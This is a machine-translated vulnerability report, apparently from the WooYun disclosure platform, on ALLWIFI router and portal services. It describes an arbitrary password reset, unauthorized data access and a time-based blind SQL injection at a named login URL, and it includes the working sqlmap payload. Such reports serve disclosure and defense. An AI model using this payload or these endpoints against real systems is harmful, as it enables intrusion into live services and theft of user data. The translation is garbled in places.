漏洞标题 Wifi安全ALLWIFI多个漏洞包(任意重置用户密码/sql注入影响20,000个路由器/未经授权的访问) 相关制造商 All-wifi.cn 漏洞作者 千机 提交时间 2016-05-13 19: 17 公共时间 2016-06-27 19: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Mysql的 漏洞详细信息 第一个是任意重置用户密码漏洞。 http://social.all-wifi.cn/index.php/login/login 看看像allwifi这样的app界面。
将验证码直接返回密码。
成功登录
然后sql注入 http://ad.all-wifi.cn/index.php/index/index.html 登录时存在Sql注入 Sqlmap从存储的会话:恢复以下注入点 --- 参数:用户(POST) 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SELECT) 有效载荷: user=admin')AND(SELECT * FROM(SELECT(SLEEP(5)))XJBB)AND('yopl' ='yopl&安培;密码=管理员
3.33亿wifi_adcount,不知道它是什么 2w7路线 足以证明伤害,而不是深刻 然后有未经授权的访问, http://lib.all-wifi.cn/ 这个网站可以看到一些数据图表和表格等,是敏感信息吗?
漏洞证明:
修理计划: 改变和改变 版权声明:请注明出处。成千上万的机器@乌云